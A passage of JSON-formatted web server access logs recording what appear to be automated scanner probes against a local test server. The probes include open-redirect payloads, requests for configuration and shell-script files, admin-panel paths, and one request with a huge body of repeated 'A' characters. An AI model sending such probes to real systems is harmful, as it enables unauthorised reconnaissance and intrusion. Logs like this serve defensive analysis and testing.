+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chpstrt.php?chppath=Home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/upgrade.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:40 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA